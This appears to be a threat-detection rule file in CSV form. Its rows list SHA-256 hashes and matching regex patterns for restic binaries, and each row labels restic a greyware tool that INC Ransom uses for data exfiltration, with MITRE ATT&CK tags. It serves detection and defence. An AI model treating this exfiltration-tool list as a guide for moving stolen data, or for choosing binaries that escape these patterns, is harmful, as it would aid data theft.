"*1665a0292194daca49b91f61498f048d3099193c562c81f60eb311aabec54313*",".{0,1000}1665a0292194daca49b91f61498f048d3099193c562c81f60eb311aabec54313.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*16935a0807abc635a6ad76b85b95fe703beaf188e5d3f27404b9e699e87c4f07*",".{0,1000}16935a0807abc635a6ad76b85b95fe703beaf188e5d3f27404b9e699e87c4f07.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1719136d3545bf0539b4e9c323e90e2389749d7f1eee98803bae39fa318af4f5*",".{0,1000}1719136d3545bf0539b4e9c323e90e2389749d7f1eee98803bae39fa318af4f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1815747d94340ba15a0443856675aa23d778c743a9cb8478b0025a40ab5add68*",".{0,1000}1815747d94340ba15a0443856675aa23d778c743a9cb8478b0025a40ab5add68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1847da329255b121b83e0da08c255017c9fcf05bf0bc99fea3714430e5d383eb*",".{0,1000}1847da329255b121b83e0da08c255017c9fcf05bf0bc99fea3714430e5d383eb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*18ac281a3d3d2df65755abadf75bbb551cf62d5613f5821ad0e08c9088978f93*",".{0,1000}18ac281a3d3d2df65755abadf75bbb551cf62d5613f5821ad0e08c9088978f93.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*18db38d87241a38cb3b44b1b2e320009fa5e129804a7970c71ea4399fc4dec27*",".{0,1000}18db38d87241a38cb3b44b1b2e320009fa5e129804a7970c71ea4399fc4dec27.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1930f4934eb50f2aca7341a4fd5cb7053c39a76fd38d185551d2b3a60283bfdf*",".{0,1000}1930f4934eb50f2aca7341a4fd5cb7053c39a76fd38d185551d2b3a60283bfdf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*193edf6cc11c84106a634bd990feda1d50c24bb99e405f1eff6bf74b965dcadd*",".{0,1000}193edf6cc11c84106a634bd990feda1d50c24bb99e405f1eff6bf74b965dcadd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*19b77a9c4b75bd82b5ed2b13f6119b5f5dd8fadbec880b1c9897f25c3beb8a71*",".{0,1000}19b77a9c4b75bd82b5ed2b13f6119b5f5dd8fadbec880b1c9897f25c3beb8a71.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*19cc16baa9f9a85123f627bc2ca7eff0f5d901a4674ea96b4ebb21df2183c8b5*",".{0,1000}19cc16baa9f9a85123f627bc2ca7eff0f5d901a4674ea96b4ebb21df2183c8b5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1a367846c52078e39113a1ff7d1d5615637a06c19a63215570e4d058c3faf329*",".{0,1000}1a367846c52078e39113a1ff7d1d5615637a06c19a63215570e4d058c3faf329.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1a56d77d702056356afad246655a1974c5df127163542753f0fcede98a250045*",".{0,1000}1a56d77d702056356afad246655a1974c5df127163542753f0fcede98a250045.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1a5c1d2a3b17aa381c318b3f3919f7cfc4cd430c3a2c3053ba055fb4ccf38c97*",".{0,1000}1a5c1d2a3b17aa381c318b3f3919f7cfc4cd430c3a2c3053ba055fb4ccf38c97.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1ad8a76a9f966da5f7a319c49a6db071a60ebaa24d69e6d86d53d6f2bcaf11ed*",".{0,1000}1ad8a76a9f966da5f7a319c49a6db071a60ebaa24d69e6d86d53d6f2bcaf11ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1ba52a6f7c12d32fd2a9d21503bcbed51533a07f24c6aa94f82b7d58eb87841d*",".{0,1000}1ba52a6f7c12d32fd2a9d21503bcbed51533a07f24c6aa94f82b7d58eb87841d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1c07a12c276062d9c70006a6e7377b7297d510ce78d52f9e62e3848ad585a822*",".{0,1000}1c07a12c276062d9c70006a6e7377b7297d510ce78d52f9e62e3848ad585a822.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1cc8655fa99f06e787871a9f8b5ceec283c856fa341a5b38824a0ca89420b0fe*",".{0,1000}1cc8655fa99f06e787871a9f8b5ceec283c856fa341a5b38824a0ca89420b0fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1d347f8bda31bc7dfce658a6b17459f32b7f8d2b76708d30bc5ee7cd3e9eab5b*",".{0,1000}1d347f8bda31bc7dfce658a6b17459f32b7f8d2b76708d30bc5ee7cd3e9eab5b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1e0e0d1e7388beaa2a892c057759fdfe6a4fe915f9518c73068761f8d6d7619d*",".{0,1000}1e0e0d1e7388beaa2a892c057759fdfe6a4fe915f9518c73068761f8d6d7619d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1e93b311f27b676be80419ae9ada6e3e599fb38e204bf27ecd14320e1b4dc1c3*",".{0,1000}1e93b311f27b676be80419ae9ada6e3e599fb38e204bf27ecd14320e1b4dc1c3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1e9aca80c4f4e263c72a83d4333a9dac0e24b24e1fe11a8dc1d9b38d77883705*",".{0,1000}1e9aca80c4f4e263c72a83d4333a9dac0e24b24e1fe11a8dc1d9b38d77883705.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1eab0f66e1cf84017ad8aac6358d7bd50fef62477281b9492ccf772be20caf3c*",".{0,1000}1eab0f66e1cf84017ad8aac6358d7bd50fef62477281b9492ccf772be20caf3c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1ed7632518a86fa468f5823d6da4826d1787845cc0969a46da110c98139a3db4*",".{0,1000}1ed7632518a86fa468f5823d6da4826d1787845cc0969a46da110c98139a3db4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1ede16b360710fe5f9471474979f8cca5ad6e2005bd0088c3d54a3272677fb4d*",".{0,1000}1ede16b360710fe5f9471474979f8cca5ad6e2005bd0088c3d54a3272677fb4d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1f9d03503d8756311b7904e99aee3460f1ace427aad88f6dcba6a97a9c5a8171*",".{0,1000}1f9d03503d8756311b7904e99aee3460f1ace427aad88f6dcba6a97a9c5a8171.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1fb74dc72e792566b0caf2c596b7d6e655caaa678b8cc0c1f6975427d64746e0*",".{0,1000}1fb74dc72e792566b0caf2c596b7d6e655caaa678b8cc0c1f6975427d64746e0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1fde906bc848a16734929e3d27c2223ab4e5be688b497cdcd8a0c4849931769b*",".{0,1000}1fde906bc848a16734929e3d27c2223ab4e5be688b497cdcd8a0c4849931769b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*20a8ce365cfc6c0fd2dd88d2e68eaeaff42970f3e1ff34bb6ff8b6d6ebeaa58f*",".{0,1000}20a8ce365cfc6c0fd2dd88d2e68eaeaff42970f3e1ff34bb6ff8b6d6ebeaa58f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*20cd35745fdb39b8ced14a6351b96ddd0c5eb248b7fb5a4ef7a3b6a7ea9bdb9b*",".{0,1000}20cd35745fdb39b8ced14a6351b96ddd0c5eb248b7fb5a4ef7a3b6a7ea9bdb9b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*20d323af78ca61c911fc9558d3621307e6a5beaaa635346bce8b5a6211c6a8f3*",".{0,1000}20d323af78ca61c911fc9558d3621307e6a5beaaa635346bce8b5a6211c6a8f3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*20d91064fbae6a009aa552a11389523f977c8bf49c1bfbd2ce5f7e33609beb08*",".{0,1000}20d91064fbae6a009aa552a11389523f977c8bf49c1bfbd2ce5f7e33609beb08.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2104df5140488fec740f2f225439d14e11343dc6865f7220cb407d83b0089068*",".{0,1000}2104df5140488fec740f2f225439d14e11343dc6865f7220cb407d83b0089068.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*21420350ef2f6884e9ef0d21c1ef82867f992e2b809b4ceb8292a8ab8dd02d3a*",".{0,1000}21420350ef2f6884e9ef0d21c1ef82867f992e2b809b4ceb8292a8ab8dd02d3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*21d614435d3d6e1e26ed3a4654232d1c1350a846cff9f620dc9e76944fd516b3*",".{0,1000}21d614435d3d6e1e26ed3a4654232d1c1350a846cff9f620dc9e76944fd516b3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2267fd0ff2e6387c44e736eccceba289a2b273fc3ccec5786af82415a1c9fa5b*",".{0,1000}2267fd0ff2e6387c44e736eccceba289a2b273fc3ccec5786af82415a1c9fa5b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*22725b8da1f7759e83424dbef84e89614767804a22e49feaba0013587f21208a*",".{0,1000}22725b8da1f7759e83424dbef84e89614767804a22e49feaba0013587f21208a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*22cc11da0c91690bdea21d873ea341d8d31f44ba32602a2e3c40809b334cdf19*",".{0,1000}22cc11da0c91690bdea21d873ea341d8d31f44ba32602a2e3c40809b334cdf19.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*239f075f17c926b724d3128ce8368fa8bb7671ff89524e445312ce115c8f727b*",".{0,1000}239f075f17c926b724d3128ce8368fa8bb7671ff89524e445312ce115c8f727b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*23c553049bbad7d777cd3b3d6065efa2edc2be13fd5eb1af15b43b6bfaf70bac*",".{0,1000}23c553049bbad7d777cd3b3d6065efa2edc2be13fd5eb1af15b43b6bfaf70bac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*23d83edaf39639ad843dc07a853215fae94265e590e6242951df5e6441dac3c4*",".{0,1000}23d83edaf39639ad843dc07a853215fae94265e590e6242951df5e6441dac3c4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*23e12a93521ba83f5a5d238030dec3cc47788a47e252eb06335b613695fe9d34*",".{0,1000}23e12a93521ba83f5a5d238030dec3cc47788a47e252eb06335b613695fe9d34.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*24125fd40e20be4c607e7ff58bdce302473460f5d31cba9172cdff2946878d1f*",".{0,1000}24125fd40e20be4c607e7ff58bdce302473460f5d31cba9172cdff2946878d1f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2467af3d886f3bd9838846f40134537336671a7ff34370145b233a3f9f265beb*",".{0,1000}2467af3d886f3bd9838846f40134537336671a7ff34370145b233a3f9f265beb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*24c7ca3fe6905b3a493a67237ff081ba9e11abfb27dcb73f18d0a4595926c35d*",".{0,1000}24c7ca3fe6905b3a493a67237ff081ba9e11abfb27dcb73f18d0a4595926c35d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2536aad7d213c553a2aa3b6c6d3402bb9adf2c7624bf004a14a19751b24ce80e*",".{0,1000}2536aad7d213c553a2aa3b6c6d3402bb9adf2c7624bf004a14a19751b24ce80e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2655b585e686b5d6c36d1be640d873fa15a53a86c46e2ceb5fb00eb562c428bb*",".{0,1000}2655b585e686b5d6c36d1be640d873fa15a53a86c46e2ceb5fb00eb562c428bb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*265b1f417eafc654b5e789ce044de99635c542f2490708835b95669ed4fa79b1*",".{0,1000}265b1f417eafc654b5e789ce044de99635c542f2490708835b95669ed4fa79b1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*26850257bff3d64408313c3f6750f9d3880a3729568bd78a40b1d75ca3d4cea1*",".{0,1000}26850257bff3d64408313c3f6750f9d3880a3729568bd78a40b1d75ca3d4cea1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*26c4c55363fc2a15122a97384a44c73fedf14b832721a0b4a86dc361468e7547*",".{0,1000}26c4c55363fc2a15122a97384a44c73fedf14b832721a0b4a86dc361468e7547.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*26d3bc4ed714c268ba2fc84034d54cbeabc230ab2e498e119a2243cefd9a93f3*",".{0,1000}26d3bc4ed714c268ba2fc84034d54cbeabc230ab2e498e119a2243cefd9a93f3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*27e14febe4ff06aa6a51e01d239d2d4e3af88407d59ffd8feffe54247309b50a*",".{0,1000}27e14febe4ff06aa6a51e01d239d2d4e3af88407d59ffd8feffe54247309b50a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*27e5b4ad48de612df3a28a8ca9d0b4015b6d24e959056d66367ec53246899e44*",".{0,1000}27e5b4ad48de612df3a28a8ca9d0b4015b6d24e959056d66367ec53246899e44.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*286cf8ac789b4752825dd6098cae26394b8803b99cd2d4cdb2153d9ef73f49c4*",".{0,1000}286cf8ac789b4752825dd6098cae26394b8803b99cd2d4cdb2153d9ef73f49c4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*287f321328930e9fcb910c216b530c9e6fc1badefa4797779369b455f16f32a6*",".{0,1000}287f321328930e9fcb910c216b530c9e6fc1badefa4797779369b455f16f32a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*288bac8790bd8f10894a70733ed78bb7afc098d55b41fe6dc4e044f80ef5612e*",".{0,1000}288bac8790bd8f10894a70733ed78bb7afc098d55b41fe6dc4e044f80ef5612e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*297ce47c277bcb97df904493b594d6a6e2ddf8c304d572214b53089f0eb55d42*",".{0,1000}297ce47c277bcb97df904493b594d6a6e2ddf8c304d572214b53089f0eb55d42.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*29b4b4f15c9b4d74a44576c80e5cbc3cc4644bf55a7c2ba29c73b3d9e4f24356*",".{0,1000}29b4b4f15c9b4d74a44576c80e5cbc3cc4644bf55a7c2ba29c73b3d9e4f24356.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*29bc472e151a34cdc5dc5229a27ad5377d091df53500e7ad0022d663a4b9d3a7*",".{0,1000}29bc472e151a34cdc5dc5229a27ad5377d091df53500e7ad0022d663a4b9d3a7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*29d8abba60342eb0cdac692d050c95feab0aa980a2c8779fa4584f97b8196f26*",".{0,1000}29d8abba60342eb0cdac692d050c95feab0aa980a2c8779fa4584f97b8196f26.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2a782979f8065e162c99cbba25bd80ace68c743192703e7b2d4cc6ca0acf5625*",".{0,1000}2a782979f8065e162c99cbba25bd80ace68c743192703e7b2d4cc6ca0acf5625.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2b3ac83c63ff25980360d246ecf86132dd1cfe3416957f145847c80494750846*",".{0,1000}2b3ac83c63ff25980360d246ecf86132dd1cfe3416957f145847c80494750846.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2c279e408c09fe9be4dad0a1f688b228a8e1948ffca2ab04431fbc53c7877c19*",".{0,1000}2c279e408c09fe9be4dad0a1f688b228a8e1948ffca2ab04431fbc53c7877c19.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
